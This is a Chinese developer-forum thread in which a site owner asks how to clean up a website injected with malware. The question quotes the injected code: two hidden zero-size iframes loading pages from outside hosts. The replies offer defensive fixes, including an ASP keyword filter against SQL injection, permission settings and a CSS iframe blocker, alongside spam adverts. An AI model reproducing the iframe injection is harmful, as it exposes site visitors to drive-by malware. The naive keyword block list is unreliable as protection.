28,391
社区成员
发帖
与我相关
我的任务
分享网站被挂马怎么办?
<iFrame src=http://aaa.77xxmm.cn/new858.htm?075 width=0 name='6965' height=0></iframe><iframe src=http://AAA.1l1l1l.com/error/404.html wIdth=0 naMe='6965' heighT=0></iframe>
name='6965' 自动'数字'!
请大家解決了嗎?告诉我!
name='6965' 自动'数字'!
请大家解決了嗎?告诉我!
...全文
请发表友善的回复…
发表回复
amu1433 2010-06-12
- 打赏
- 举报
权限问题 服务器上 不给他修改文件的权限 把修改权限给去掉 然后查找漏洞..修补漏洞 就行了 一半漏洞都是上次漏洞 或者注入漏洞
注入漏洞的话 在数据库文件中添加 如下代码
'--------SQL防注入定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh
Fy_In = "or|注入的关键字 以竖线|隔开..么办法 CSDN屏蔽了 我也发不了"
Fy_Inf = split(Fy_In,"|")
'--------POST部份------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language=JavaScript>alert('QQ群90316079:本此操作失败了!↓\n\n您提交的有非法字!');history.back();</Script>"
Response.End
End If
Next
Next
End If
注入漏洞的话 在数据库文件中添加 如下代码
'--------SQL防注入定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh
Fy_In = "or|注入的关键字 以竖线|隔开..么办法 CSDN屏蔽了 我也发不了"
Fy_Inf = split(Fy_In,"|")
'--------POST部份------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language=JavaScript>alert('QQ群90316079:本此操作失败了!↓\n\n您提交的有非法字!');history.back();</Script>"
Response.End
End If
Next
Next
End If
chen_bruce 2010-06-11
- 打赏
- 举报
10楼这丫的到哪发哪,你还累啊?楼主可用冰舞之类的软件检测下是否存在漏洞
zminghua 2009-06-24
- 打赏
- 举报
给你个木马先把马给替换了,然后再给你一个防注入程序过虑一下.基本可以搞定.联系danlan_sky@126.com
canghai009 2009-06-24
- 打赏
- 举报
你想交电脑界朋友嘛~我虽说称不上高手,但是对电脑的工作了如指掌,有空的朋友看看这个问题,我已经解决了,电脑开不开机,主机回转。但是显示器不会显示。http://net-ke.cn/0_5_101553.aspx
CainLai 2009-06-24
- 打赏
- 举报
LZ要得是解决办法,我来帮顶等高人
vgy12304 2009-06-24
- 打赏
- 举报
这个是典型的文件注入,主要是上传漏洞引起的。
根本上的解决办法:设置权限:
全站写保护(只读权限)
上传文件夹:写权限,禁止运行权限
sql字段过滤
绝对能根除这个注入,如果你的虚拟主机没这个功能的话,你就考虑换一个有足够管理权限的
根本上的解决办法:设置权限:
全站写保护(只读权限)
上传文件夹:写权限,禁止运行权限
sql字段过滤
绝对能根除这个注入,如果你的虚拟主机没这个功能的话,你就考虑换一个有足够管理权限的
xhj800311 2009-06-23
- 打赏
- 举报
…………服务器的安全很重要的…………
明珠佩佩 2009-06-23
- 打赏
- 举报
很明显是你服务器的安全存在问题
落日听风 2009-06-23
- 打赏
- 举报
清网站代码,加防注入代码,防注入代码网上可以搜到
heyisheng 2009-06-22
- 打赏
- 举报
这问题很严重,很明显是网站存在漏洞而被攻击了,若需要安全技术服务请联系EMAIL & MSN:yisheng@hotmail.com, 7X24 为您的网站和服务器保驾护航。
ledavie 2008-01-12
- 打赏
- 举报
切断iframe里的请求 在CSS里加上 iframe{自定义属性:expression(this.src='about:blank',this.outerHTML='');}
